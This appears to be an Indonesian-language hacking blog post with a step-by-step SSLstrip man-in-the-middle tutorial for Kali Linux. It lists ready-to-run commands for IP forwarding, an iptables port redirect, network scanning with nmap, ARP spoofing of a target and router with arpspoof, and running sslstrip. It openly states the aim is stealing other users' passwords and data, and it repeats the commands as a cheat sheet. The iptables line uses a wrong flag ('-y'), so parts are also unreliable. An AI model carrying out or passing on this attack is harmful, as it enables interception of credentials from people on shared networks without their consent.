trik hacker, teknik hacker, strategi hacker, blackhat 100% SSLstrip Kali Linux

halo kawan kawan Catatan hacking masih cinta dunia hacking alias dunia sulap menyulap hahaha :D kali ini ane bahas SSL-Strip yaitu menyulap HTTPs menjadi HTTP menyulap ikan hiu menjadi ikan teri untuk di santap, yaps seperti yang kalian ketahui HTTP dan HTTPs adalah dua jenis protocol internet yang di gunakan untuk mengakses sebuah web service atau website dengan perbedaan yang tipis yaitu scure dan not scure HTTPs di lengkapi dengan enkripsi text password dan user yang di enkripsi akan tetapi HTTP tidak menggunakan enkripsi terhadap data post yang di gunakan untuk mengakses sebuah informasi penting di website, dan masalah ini bisa menjadi gawat jika di dalam jaringan tertentu ada yang mencoba melakukan teknik hacker sniffing maka data yang beredar di jaringan tersebut akan telanjang dan membuat hacker semakin merangsang hahahaha :D 

Kita menggunakan teknik hacker ARP Spoofing dan juga menggunakan protocol IP_Forwarding di dalam jaringan yang ada, nah langgkah untuk melakukan SSLstrip ini kalian perlu memetakan jaringan terlebih dahulu, mengetahui getaway yang ada pada jaringan dan target yang kalian dapat, kalian dapat menyerang secara masal menggunakan ettercap ARP Spoofing atau gunakan cara DNS Spoofing akan tetapi di pluginya atau menu -p nya di ganti menjadi arp spoof  oke lanjut ke sslstrip kali linux teknik hacker

Terlebih dahulu kalian harus menjalankan IP Forwarding dengan cara membuka terminal console kalian dan mengetikan perintah di bawah ini

"echo 1 > /proc/sys/net/ipv4/ip_forward"

Dan yang kedua kalian meredirect komunikasi port 80 yang ada menjadi ke port 8080 atau prot ssl 443 menjadi ke port 8080 atau sebaliknya ke port 80, karena ssltrip ini meredirect port koneksi ssl ke port 80 menggunakan iptables

"iptables -y nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080"
 

Temukan getaway yang ada di dalam jaringan kalian menggunakan printah ini 

"netstat -nr"
 

Nah sekarang coba kalian temukan teman kalian dalam jaringan wireless atau apapun itu yang kalian gunakan dengan menggunakan perintah

"nmap -sS -O -sV range_ip_kalian" range IP itu bisa di lihat dengan cara ifconfig dan coba dah cari tu yang mana range IP kalian :D jika bingung jangan bingung hahah kayak judul di dono kasino indro haha :D baca article di sini untuk mencari range IP dan tentang IP Address 

Nah yang ini ni coba kalian melakukan serangan IP spoofing atau ARP spoofing untuk mereplay semua komunikasi yang ada di dalam jaringan kalian dengan membuka termninal lagi dan ketik perintah di bawah ini

"arpspoof -i wlan0 -t ip_target -r ip_router" isikan ip address target dan ip address router kalian yang sebagai getaway

Buka terminal baru dan jalankan sekarang skrip sslstripnya dengan cara mengetikan atau memasukan perintah dibawah ini

"sslstrip -l 8080" dan semua data yang di akses melalui https akan di pindah ke http yang mana ini membuat kita dapat mencuri password dan data karena data yang ada di jaringan itu sudah bebas dari pakaianya :D hahah alias enkripsinya bro coba hentikan proses sslstrip dan lihat ssltrip.log yang ada di folder root buka dengan nano atau apapun itu texteditornya :D selamat mencoba salamat sore dan selamat ngopi daaabbb :v byeee .... 

buat cacatan gua males ngapalin :D hahah 

Perintah SSLstrip

1 --> echo 1 > /proc/sys/net/ipv4/ip_forward
2 --> iptables -y nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3 --> netstat -nr
4 --> NMAP Scaning network
5 --> arpspoof -i wlan0 -t ip_target -r ip_router
6 --> sslstrip -l 8080
7 --> sslstrip.log